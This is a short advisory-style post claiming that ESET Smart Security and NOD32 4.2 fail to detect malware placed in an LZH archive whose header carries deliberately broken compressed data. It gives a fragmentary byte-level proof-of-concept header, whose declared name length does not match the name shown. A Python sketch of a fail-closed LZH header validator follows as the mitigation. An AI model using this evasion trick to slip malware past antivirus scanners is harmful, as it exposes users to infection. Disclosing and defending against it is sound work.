Hi,

As we know, all anti-virus software has limited scope in protecting users from malware. This draft will show you how ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) are bypassing viruses if specially archived in a format (LZH archived).
The below will compress the malicious data into LZH format.

POC:

"5" # Compression method (LZW, Arithmetic Encoding)
"\x20\x01" # File attribute
"\x08" # File name length
"VIRAL.TXT" # File name
"\xDC\x41\x4D\x00\x00\x00\x0B\x33\x6D\x66\x49\x5D" # !!! broken LZW compressed data
"\x23\x08\x8A\x78\x00\x00\xC0\x81\xA5\xC0\xD7\x20" #

The above format speaks about the header and content to be specified in LZH archive formatting. The malware is originally compressed and then this above header is written to a file and renamed with extension of LZH and then scanned with the anti-virus software.

*** It's purely for educational purposes.

Regards,
0xN41K
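On the scanning side, the mitigation for the case described in this post is to fail closed: an archive member whose header or compressed data does not parse is reported as unscannable, never as clean. The sketch below is an added example, not code from the post or from any vendor. It assumes the commonly documented level-0/1 LZH header layout, and `header_findings`, `verdict` and `build_member` are hypothetical names.

```python
import struct

# Method ids accepted by this sketch (assumption: standard LHA ids).
KNOWN_METHODS = {b"-lh0-", b"-lh1-", b"-lh4-", b"-lh5-", b"-lh6-", b"-lh7-", b"-lhd-"}

def header_findings(buf):
    """Return reasons a level-0/1 LZH member must not be reported as clean."""
    if len(buf) < 22:
        return ["truncated before the fixed header fields"]
    hdr_size, checksum, level, name_len = buf[0], buf[1], buf[20], buf[21]
    packed_size, _orig_size = struct.unpack_from("<II", buf, 7)
    if level not in (0, 1):
        return ["header level %d not handled by this sketch" % level]
    findings = []
    end = 2 + hdr_size  # header size counts bytes after the first two
    if buf[2:7] not in KNOWN_METHODS:
        findings.append("unknown compression method id")
    if end > len(buf):
        findings.append("header size runs past end of file")
    elif sum(buf[2:end]) & 0xFF != checksum:
        findings.append("header checksum mismatch")
    if 22 + name_len + 2 > end:  # name plus CRC16 must fit in the header
        findings.append("file name length does not fit in header")
    if len(buf) - end < packed_size:
        findings.append("declared packed size exceeds bytes present")
    return findings

def verdict(buf, decoder_ok=True):
    """Fail closed: any header finding or decoder error means 'unscannable'."""
    return "unscannable" if header_findings(buf) or not decoder_ok else "scan-contents"

def build_member(name, data):
    """Constructed sample: stored (-lh0-) level-0 member; CRC16 left as zero."""
    body = (b"-lh0-" + struct.pack("<III", len(data), len(data), 0)
            + b"\x20\x00" + bytes([len(name)]) + name + b"\x00\x00")
    return bytes([len(body), sum(body) & 0xFF]) + body + data

if __name__ == "__main__":
    good = build_member(b"SAMPLE.TXT", b"hello")
    print(verdict(good), header_findings(good[:-3]))
```

The `decoder_ok` flag stands in for the result of the real decompressor, so a member with a well-formed header but undecodable data still ends up as unscannable and can be quarantined or escalated by policy.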
